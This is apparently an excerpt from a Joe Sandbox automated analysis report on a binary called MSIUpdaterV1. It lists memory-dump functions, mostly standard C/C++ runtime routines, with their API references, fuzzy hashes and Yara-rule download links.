Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f88eea0f890ef59aa870667279dc74d8519f8f4cc4a2a23a287af96ebac2b0f9
Instruction ID: d47f26c1ad2f69986a4e5589ff3789544c98181ca8fb044c44f64869a222f34f
Opcode Fuzzy Hash: f88eea0f890ef59aa870667279dc74d8519f8f4cc4a2a23a287af96ebac2b0f9
Instruction Fuzzy Hash: 2701D671908629AFDB258F54DC49FAEBBFAFB04B11F044525F812A26E0DB759940CA90

Uniqueness

Uniqueness Score: -1.00%

Function 0019A2AA Relevance: 7.7, APIs: 5, Instructions: 248COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 0019A4E5
__freea.LIBCMT ref: 0019A4EB
__freea.LIBCMT ref: 0019A521
__freea.LIBCMT ref: 0019A527
__freea.LIBCMT ref: 0019A537

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: __freea
String ID:
API String ID: 240046367-0
Opcode ID: 1f2ed74f7ca1864c194b01ef2bbed7803c98c6ae8fcbabfe6cba9a12c834c3bf
Instruction ID: 57713d206ef6e23aa91fe14e0296d08f6c7b22d08187f6256563f0bcfe5f0543
Opcode Fuzzy Hash: 1f2ed74f7ca1864c194b01ef2bbed7803c98c6ae8fcbabfe6cba9a12c834c3bf
Instruction Fuzzy Hash: 77711772A002059BEF219F648C46FAE77B9AF94314FA90059FC04E7281EB75DE49C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 00160830 Relevance: 7.6, APIs: 5, Instructions: 119COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0016085A
std::_Lockit::_Lockit.LIBCPMT ref: 0016087C
std::_Lockit::~_Lockit.LIBCPMT ref: 001608A4
std::_Facet_Register.LIBCPMT ref: 0016099A
std::_Lockit::~_Lockit.LIBCPMT ref: 001609C4

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 08538a2e2ebb705bae5228e17322a5acbd34cb48e70500a9406b1931b77c7c8c
Instruction ID: 6aae033ba76ee6c8314ce4fbe707b6b9698bab5f5c709f5ff25835849f151866
Opcode Fuzzy Hash: 08538a2e2ebb705bae5228e17322a5acbd34cb48e70500a9406b1931b77c7c8c
Instruction Fuzzy Hash: B5518BB0900648DFEB12DF58C8447AEBBF4FF14314F248559E849AB382D7B5AA09CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00160830 Relevance: 7.6, APIs: 5, Instructions: 119COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0016085A
std::_Lockit::_Lockit.LIBCPMT ref: 0016087C
std::_Lockit::~_Lockit.LIBCPMT ref: 001608A4
std::_Facet_Register.LIBCPMT ref: 0016099A
std::_Lockit::~_Lockit.LIBCPMT ref: 001609C4

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 08538a2e2ebb705bae5228e17322a5acbd34cb48e70500a9406b1931b77c7c8c
Instruction ID: 6aae033ba76ee6c8314ce4fbe707b6b9698bab5f5c709f5ff25835849f151866
Opcode Fuzzy Hash: 08538a2e2ebb705bae5228e17322a5acbd34cb48e70500a9406b1931b77c7c8c
Instruction Fuzzy Hash: B5518BB0900648DFEB12DF58C8447AEBBF4FF14314F248559E849AB382D7B5AA09CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0023A110 Relevance: 7.6, Strings: 6, Instructions: 117COMMON

Download Yara Rule

Strings

#O, xrefs: 0023A152
p"O, xrefs: 0023A170
`"O, xrefs: 0023A17A
`#O, xrefs: 0023A138
@#O, xrefs: 0023A146
P"O, xrefs: 0023A184

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID:
String ID: #O$@#O$P"O$`"O$`#O$p"O
API String ID: 0-556409215
Opcode ID: 4d36ab9ff965ee9c119f4e5532b28964275d04992a02c0eff89245242649a1ac
Instruction ID: bce337711989ada1f032d61a8f6feca578d10b00fde8d0b0a7fac10c5ac92a23
Opcode Fuzzy Hash: 4d36ab9ff965ee9c119f4e5532b28964275d04992a02c0eff89245242649a1ac
Instruction Fuzzy Hash: F341B3F1E1021D57DB21DF659D45BEEB7B8AB54304F1081B5FD8CA2200E7BA46D48F92

Uniqueness

Uniqueness Score: -1.00%

Function 001194CD Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001194D4
std::_Lockit::_Lockit.LIBCPMT ref: 001194DE

Part of subcall function 00111A00: std::_Lockit::_Lockit.LIBCPMT ref: 00111A0F
Part of subcall function 00111A00: std::_Lockit::~_Lockit.LIBCPMT ref: 00111A2A

codecvt.LIBCPMT ref: 00119518
std::_Facet_Register.LIBCPMT ref: 0011952F
std::_Lockit::~_Lockit.LIBCPMT ref: 0011954F

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 464234816c7afbd73aff09b6cc11da4f001482294423f272c7a377e7ca21a388
Instruction ID: de1136a745acff8588d46396fb1fa36dd2993a0f0fc405b478a98d645578fba2
Opcode Fuzzy Hash: 464234816c7afbd73aff09b6cc11da4f001482294423f272c7a377e7ca21a388
Instruction Fuzzy Hash: D511B4759042159FCB19AB64D9117EEB7B5BF54320F14442AE421A7291DFB0AA81CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00117DD0 Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00117DD7
std::_Lockit::_Lockit.LIBCPMT ref: 00117DE1

Part of subcall function 00111A00: std::_Lockit::_Lockit.LIBCPMT ref: 00111A0F
Part of subcall function 00111A00: std::_Lockit::~_Lockit.LIBCPMT ref: 00111A2A

codecvt.LIBCPMT ref: 00117E1B
std::_Facet_Register.LIBCPMT ref: 00117E32
std::_Lockit::~_Lockit.LIBCPMT ref: 00117E52

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 2f0928dea67514cfd5205fa2d9b292401af1a9b51af3279e1e000e614f562987
Instruction ID: 37f257d2068df98cda915cddcec6faad4fbc0f6b8ea5a32b5d71387bac793aaa
Opcode Fuzzy Hash: 2f0928dea67514cfd5205fa2d9b292401af1a9b51af3279e1e000e614f562987
Instruction Fuzzy Hash: EF1103719092289FCB09FB64C9016EEBBF5EF94710F144469E411A73C1DBB0EE818B80

Uniqueness

Uniqueness Score: -1.00%

Function 00119250 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00119257
std::_Lockit::_Lockit.LIBCPMT ref: 00119262
std::_Lockit::~_Lockit.LIBCPMT ref: 001192D0

Part of subcall function 001193B3: std::locale::_Locimp::_Locimp.LIBCPMT ref: 001193CB

std::locale::_Setgloballocale.LIBCPMT ref: 0011927D
_Yarn.LIBCPMT ref: 00119293

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 9ee2b555f5780865ab644ebb798b8187bb96c18012748c78656f9759cb01d770
Instruction ID: 80c2d900c4a5b77b2038435bcad9835864e4e3aa72eacb1751d4f82a2f2ef3cd
Opcode Fuzzy Hash: 9ee2b555f5780865ab644ebb798b8187bb96c18012748c78656f9759cb01d770
Instruction Fuzzy Hash: 70017C75A091219BD70AEF60D8659BCB7B1BF95350F148029E821573D1CFB4AE82CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 00168190 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 430COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00168316
Concurrency::cancel_current_task.LIBCPMT ref: 00168525

Strings

@cX, xrefs: 0016861E

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: @cX
API String ID: 118556049-2763765104
Opcode ID: 22de6d2121386a8688ef1e3d84cb010042b9be8688daba126b9209ba363cb2bd
Instruction ID: cb314e9adde0b7df3b375a8b8200963f690ad185d7034f948b8b7f817f7b3b7e
Opcode Fuzzy Hash: 22de6d2121386a8688ef1e3d84cb010042b9be8688daba126b9209ba363cb2bd
Instruction Fuzzy Hash: E1E1C2B1A002059FCB14DF68CD95AAEBBB5FB58310F148329E819E7395DB30AE15CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00168190 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 430COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00168316
Concurrency::cancel_current_task.LIBCPMT ref: 00168525

Strings

@cX, xrefs: 0016861E

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: @cX
API String ID: 118556049-2763765104
Opcode ID: 22de6d2121386a8688ef1e3d84cb010042b9be8688daba126b9209ba363cb2bd
Instruction ID: cb314e9adde0b7df3b375a8b8200963f690ad185d7034f948b8b7f817f7b3b7e
Opcode Fuzzy Hash: 22de6d2121386a8688ef1e3d84cb010042b9be8688daba126b9209ba363cb2bd
Instruction Fuzzy Hash: E1E1C2B1A002059FCB14DF68CD95AAEBBB5FB58310F148329E819E7395DB30AE15CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 001870C3 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

__dosmaperr.LIBCMT ref: 001871DE
__dosmaperr.LIBCMT ref: 001871FD
__dosmaperr.LIBCMT ref: 001873A3

Strings

H, xrefs: 00187328

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: __dosmaperr
String ID: H
API String ID: 2332233096-2852464175
Opcode ID: e762474d18bea60e1aaf4882e31d1a3a7bcf1b57b5c7f4dbe6931a43b0312cca
Instruction ID: 082abc52db7fed825ae0240c8e5460c2f86c04b72b8d92fe76efb1205e86b6f7
Opcode Fuzzy Hash: e762474d18bea60e1aaf4882e31d1a3a7bcf1b57b5c7f4dbe6931a43b0312cca
Instruction Fuzzy Hash: 92A12632A186549FCF19BF68DC95BAD3BA1EB16310F240149FC01AB2E1D7358E46DF51

Uniqueness

Uniqueness Score: -1.00%

Function 001870C3 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

__dosmaperr.LIBCMT ref: 001871DE
__dosmaperr.LIBCMT ref: 001871FD
__dosmaperr.LIBCMT ref: 001873A3

Strings

H, xrefs: 00187328

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: __dosmaperr
String ID: H
API String ID: 2332233096-2852464175
Opcode ID: e762474d18bea60e1aaf4882e31d1a3a7bcf1b57b5c7f4dbe6931a43b0312cca
Instruction ID: 082abc52db7fed825ae0240c8e5460c2f86c04b72b8d92fe76efb1205e86b6f7
Opcode Fuzzy Hash: e762474d18bea60e1aaf4882e31d1a3a7bcf1b57b5c7f4dbe6931a43b0312cca
Instruction Fuzzy Hash: 92A12632A186549FCF19BF68DC95BAD3BA1EB16310F240149FC01AB2E1D7358E46DF51

Uniqueness

Uniqueness Score: -1.00%

Function 0011E94D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0011E972
CatchIt.LIBVCRUNTIME ref: 0011EA58

Strings

RCC, xrefs: 0011E98C
MOC, xrefs: 0011E984

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 18e815a49154d0ea371a996dff416928a26889ae0043eba4bd05674849ac8939
Instruction ID: 7eed1e949981f2603f81ee734443c11f3814f5f159bda943f1869b65e179854d
Opcode Fuzzy Hash: 18e815a49154d0ea371a996dff416928a26889ae0043eba4bd05674849ac8939
Instruction Fuzzy Hash: C7415872900209AFCF19CFD8DC81AEEBBB5BF48304F188169FD04A7261D3359A91DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00112190 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0011222D

Part of subcall function 0011BCA0: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00117D55,?,00140178,?), ref: 0011BD00

Strings

ios_base::badbit set, xrefs: 001121C7, 001121F2, 00112210
ios_base::eofbit set, xrefs: 001121D6
ios_base::failbit set, xrefs: 001121D1

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: dd0b1b23a0fc200415f2c4ff8fb750da662edfccd389fee74d97d54e4d8bd917
Instruction ID: 7205373fe35a3c38c04f50a2e086883d0be801fa120b9959c7d0e4878a0ec93a
Opcode Fuzzy Hash: dd0b1b23a0fc200415f2c4ff8fb750da662edfccd389fee74d97d54e4d8bd917
Instruction Fuzzy Hash: C711D6B29047056BC718DF68C841BD6F3E8AF15310F04893AFE59A7681F770A9A4CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0011F382 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,0011F333,00000000,00000001,0014382C,?,?,?,0011F4D6,00000004,InitializeCriticalSectionEx,00138D40,InitializeCriticalSectionEx), ref: 0011F38F
GetLastError.KERNEL32(?,0011F333,00000000,00000001,0014382C,?,?,?,0011F4D6,00000004,InitializeCriticalSectionEx,00138D40,InitializeCriticalSectionEx,00000000,?,0011F28D), ref: 0011F399
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,0011E1A3), ref: 0011F3C1

Strings

api-ms-, xrefs: 0011F3A6

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: f76432f5b44ab2f7b0428587152acf52d92d65e56e499abf0be76afb50b989ec
Instruction ID: 2ab7038a9387f9aa7218531f079fd0d0b66c178d85fa80c147e1d415498304e5
Opcode Fuzzy Hash: f76432f5b44ab2f7b0428587152acf52d92d65e56e499abf0be76afb50b989ec
Instruction Fuzzy Hash: B2E04F70298304BBEF242F61ED06B993E59AF11B50F140076FA0DE84E0DB61A991D684

Uniqueness

Uniqueness Score: -1.00%

Function 0012AA16 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(84C11AEF,00000000,00000000,00000000), ref: 0012AA79

Part of subcall function 0012E024: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0012DAC7,?,00000000,-00000008), ref: 0012E0D0

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0012ACD4
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0012AD1C
GetLastError.KERNEL32 ref: 0012ADBF

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 1184c5013f3c34687d0ab32d57e9ac3577f0e81b73870b0b9f205e6913300ade
Instruction ID: beb55ba62c557b68d2be8a1d18359402d8e862b9e61791c275dad7701ce3024f
